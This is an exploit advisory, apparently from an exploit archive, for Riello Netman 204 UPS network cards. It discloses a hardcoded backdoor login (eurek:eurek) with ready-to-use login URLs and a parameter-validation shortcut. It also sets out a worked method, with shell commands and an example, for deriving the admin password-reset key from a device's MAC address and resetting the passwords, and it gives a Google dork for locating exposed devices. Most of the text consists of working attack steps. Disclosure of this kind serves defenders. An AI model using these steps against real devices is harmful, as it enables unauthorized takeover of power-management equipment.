Netman 204 Backdoor / Password Reset

`# Exploit Title: Netman 204 Backdoor and weak password recovery function  
# Google Dork: intitle:"Netman 204 login"  
# Date: 31st Jan 2017  
# Exploit Author: Simon Gurney  
# Vendor Homepage: blog.synack.co.uk  
# Software Link: http://www.riello-ups.co.uk/uploads/file/319/1319/FW058-0105__FW_B0225_NetMan_204_.zip  
# Version: S14-1 and S15-2  
# Tested on: Reillo UPS  
# CVE : N/A  
  
Netman 204 cards have a backdoor account eurek:eurek.  
  
This account can be logged with by simply browsing to the URL  
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek  
or  
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek  
  
Due to flaws in parameter validation, the URL can be shortened to:  
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek  
or  
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek  
  
If an admin has changed the passwords, they can be reset by generating a reset key from the MAC address if you are on the same subnet:  
  
NETMANID=204:`/sbin/ifconfig eth0 | awk '/HWaddr/ {print $NF}' `  
KEY=`echo .$NETMANID | md5sum | cut -c2-10`  
  
To generate the key, do an MD5 hash of 204:[MAC ADDRESS]  
Such as,  
204:AA:BB:CC:DD:EE:FF == 0354a655811843aab718cfcf973c7dab  
Then take characters 2-10, where position 1 is character 1 (not 0).  
Such as,  
354a65581  
  
Then browse to the url:  
http://[ip]/cgi-bin/recover2.cgi?password=354a65581  
or  
https://[ip]/cgi-bin/recover2.cgi?password=354a65581  
  
  
Passwords have now been reset.  
  
  
`